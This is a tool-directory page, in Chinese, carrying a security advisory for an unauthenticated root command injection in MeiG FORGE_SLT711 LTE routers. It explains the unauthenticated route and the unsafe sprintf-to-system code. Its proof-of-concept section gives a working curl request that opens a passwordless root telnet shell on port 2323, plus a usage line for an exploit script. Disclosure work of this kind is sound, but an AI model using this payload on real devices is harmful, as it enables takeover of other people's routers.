Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-36356 — CVE-2026-36356: MeiG Smart FORGE_SLT711 GoAhead - 未授权操作系统命令注入(以 root 权限实现远程代码执行) | Kitploit
工具/GitHubGitHub/totekuh/cve-2026-36356
物联网安全漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制Payload 开发
GitHubtotekuh/cve-2026-36356

CVE-2026-36356

CVE-2026-36356: MeiG Smart FORGE_SLT711 GoAhead - 未授权操作系统命令注入(以 root 权限实现远程代码执行)

查看仓库
1114个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-36356: MeiG Smart FORGE_SLT711 GoAhead — 未认证的 OS 命令注入(/action/SetRemoteAccessCfg)

  • CVE: CVE-2026-36356
  • CWE: CWE-78, CWE-306
  • 发现者: Daniil Gordeev
  • 披露日期: 2026-05-03

概述

MeiG Smart FORGE_SLT711 4G LTE CPE 设备附带的 GoAhead Web 服务器暴露了一个未认证的 HTTP 端点 /action/SetRemoteAccessCfg,该端点将用户可控的 JSON 输入直接拼接到 shell 命令中,且未进行任何过滤。单个未认证的 POST 请求即可以 root 身份执行任意命令。

存在两个独立的根本原因:一是缺少身份验证路由条目,二是处理程序中的不安全 sprintf() → system() 构造。

受影响产品

  • 厂商: MeiG Smart Technology Co., Ltd.(中国深圳)
  • 产品: FORGE_SLT711 4G LTE CPE 路由器
  • 已确认固件: MDM9607.LE.1.0-00110-STD.PROD-1(调制解调器固件 BC-MGST711H_1.1.1_EQ101)
  • Web 服务器: GoAhead 3.x (Embedthis),带有 MeiG 自定义 action 处理器(/usr/bin/goahead)

漏洞代码位于 MeiG 的自定义 action 处理器中,而非上游 GoAhead。该产品线的其他固件版本可能也会受到影响;这一点尚未经过独立验证。

测试环境

设备Ortel 4G LTE CPE(OEM:MeiG FORGE_SLT711)
SoCQualcomm MDM9607, ARMv7 Cortex-A7
内核Linux 3.18.48
固件MDM9607.LE.1.0-00110-STD.PROD-1
日期2026-02-21

技术细节

缺少身份验证(CWE-306)

GoAhead 路由配置文件 /var/www/route.txt 使用 auth=basic 列出了已认证的路由(第 64–150 行)。/action/SetRemoteAccessCfg 不在该列表中。路由会落入第 156 行的兜底规则:

root@kitploit:~
route uri=/action handler=action

该兜底规则没有 auth=basic,因此任何 HTTP 客户端都可以在无需凭据的情况下调用 /action/SetRemoteAccessCfg。

命令注入(CWE-78)

/usr/bin/goahead 中偏移 0x0003c6d8 处的处理器反编译结果如下:

root@kitploit:~
char password_buf[64];      // 0x40 bytes on stack
char command_buf[256];      // 0x100 bytes on stack

websGetJsonItemValue(json, "password", STRING, password_buf, 0x40);
sprintf(command_buf, "echo root:\"%s\"|chpasswd", password_buf);
system(command_buf);

password 字段被插入到双引号内。$(...) 替换和 `...` 反引号会在双引号内展开,因此攻击者可以控制 shell 命令。由于 GoAhead 进程以 root 身份运行,system() 以 uid=0 执行命令。没有任何输入验证、转义或字符白名单。

概念验证

持久化 telnet 后门

root@kitploit:~
curl -s -X POST http://192.168.1.1/action/SetRemoteAccessCfg \
  -H "Content-Type: application/json" \
  -d '{"password":"$(telnetd -l /bin/sh -p 2323 &)"}'
# Reachable via: telnet 192.168.1.1 2323 (root shell, no password)

未认证的 RCE → 在 MeiG FORGE_SLT711(Ortel 4G LTE CPE)上通过 /action/SetRemoteAccessCfg 获得 root shell

参考 Python 漏洞利用

poc_rce.py(随本公告一同发布):

root@kitploit:~
python3 poc_rce.py --ip 192.168.1.1 --cmd 'id > /tmp/out'

该利用方式是盲注(blind)——命令输出不会包含在 HTTP 响应中。

载荷限制

  • password 缓冲区:64 字节
  • 最终命令缓冲区:256 字节
下载工具